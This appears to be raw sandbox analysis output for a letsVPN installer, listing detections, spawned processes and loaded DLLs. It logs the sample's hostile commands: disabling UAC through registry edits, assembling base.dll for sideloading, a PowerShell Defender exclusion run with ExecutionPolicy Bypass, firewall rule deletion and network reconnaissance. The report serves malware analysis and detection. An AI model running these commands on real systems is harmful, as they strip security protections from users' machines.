              Source: letsvpn-latest.exe, 00000013.00000003.2535561540.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2538895863.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2537272011.000000000536F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2342669907.0000000002D93000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000038.00000002.3996035893.0000000068071000.00000002.00000001.01000000.0000002A.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: letsVPN.exeVirustotal: Detection: 32%
              Source: letsVPN.exeReversingLabs: Detection: 23%
              Source: tapinstall.exeString found in binary or memory: ng of the list. When the subcommand completes, the cursor is positioned on the newly-added filter. + Add after
              Source: tapinstall.exeString found in binary or memory: positioned on the newly-added filter. ! Deletes the next occurrence of the specified filter. When the subcommand
              Source: unknownProcess created: C:\Users\user\Desktop\letsVPN.exe "C:\Users\user\Desktop\letsVPN.exe"
              Source: C:\Users\user\Desktop\letsVPN.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ipconfig /all
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
              Source: C:\Users\user\Desktop\letsVPN.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\System32\netsh.exe" exec C:\ProgramData\QqXF5.xml
              Source: C:\Users\user\Desktop\letsVPN.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Roaming\b6Jzu.bat"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t reg_dword /d 0 /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop /t reg_dword /d 0 /F
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: C:\Users\user\Desktop\letsVPN.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /b C:\ProgramData\0zVlL\Jd0i4~16\s+C:\ProgramData\0zVlL\Jd0i4~16\a C:\ProgramData\0zVlL\Jd0i4~16\base.dll
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\System32\mmc.exe C:\Windows\system32\mmc.exe -Embedding
              Source: C:\Windows\System32\mmc.exeProcess created: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe "C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe"
              Source: unknownProcess created: C:\Windows\System32\mmc.exe C:\Windows\system32\mmc.exe -Embedding
              Source: C:\Windows\System32\mmc.exeProcess created: C:\ProgramData\letsvpn-latest.exe "C:\ProgramData\letsvpn-latest.exe"
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ipconfig /all
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" install "C:\Program Files (x86)\letsvpn\driver\OemVista.inf" tap0901
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\drvinst.exe DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{9d4cf18c-09fd-0e44-8812-c8157ed143b2}\oemvista.inf" "9" "4d14a44ff" "0000000000000158" "WinSta0\Default" "000000000000016C" "208" "c:\program files (x86)\letsvpn\driver"
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\drvinst.exe DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem4.inf" "oem4.inf:3beb73aff103cc24:tap0901.ndi:9.24.6.601:tap0901," "4d14a44ff" "000000000000011C"
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=lets
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=lets
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=lets.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=lets.exe
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsPRO.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsPRO.exe
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsPRO
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsPRO
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsVPN
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsVPN
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Program Files (x86)\letsvpn\LetsPRO.exe "C:\Program Files (x86)\letsvpn\LetsPRO.exe" checkNetFramework
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeProcess created: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" checkNetFramework
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Program Files (x86)\letsvpn\LetsPRO.exe "C:\Program Files (x86)\letsvpn\LetsPRO.exe"
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeProcess created: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe"
              Source: unknownProcess created: C:\Windows\System32\wbem\WmiApSrv.exe C:\Windows\system32\wbem\WmiApSrv.exe
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s Netman
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C ipconfig /all
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C route print
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ROUTE.EXE route print
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C arp -a
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ARP.EXE arp -a
              Source: unknownProcess created: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" /silent
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess created: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" "/silent"
              Source: unknownProcess created: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" /silent
              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: acgenral.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: mfc42u.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: mmcbase.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: duser.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: ninput.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: dui70.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: mmcndmgr.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: dataexchange.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: d3d11.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: dcomp.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: dxgi.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: atlthunk.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: base.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: wininet.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: msvcp120.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: msvcr120.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: msimg32.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: winmm.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: msvcr120.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: wldp.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: propsys.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: devenum.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: devobj.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: msdmo.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: acgenral.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: mfc42u.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: mmcbase.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: duser.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: ninput.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: dui70.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: mmcndmgr.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: dataexchange.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: d3d11.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: dcomp.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: dxgi.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: atlthunk.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: uxtheme.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: userenv.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: apphelp.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: propsys.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: dwmapi.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: cryptbase.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: oleacc.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: ntmarta.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: version.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: shfolder.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: kernel.appcore.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: windows.storage.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: wldp.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: profapi.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: riched20.dll
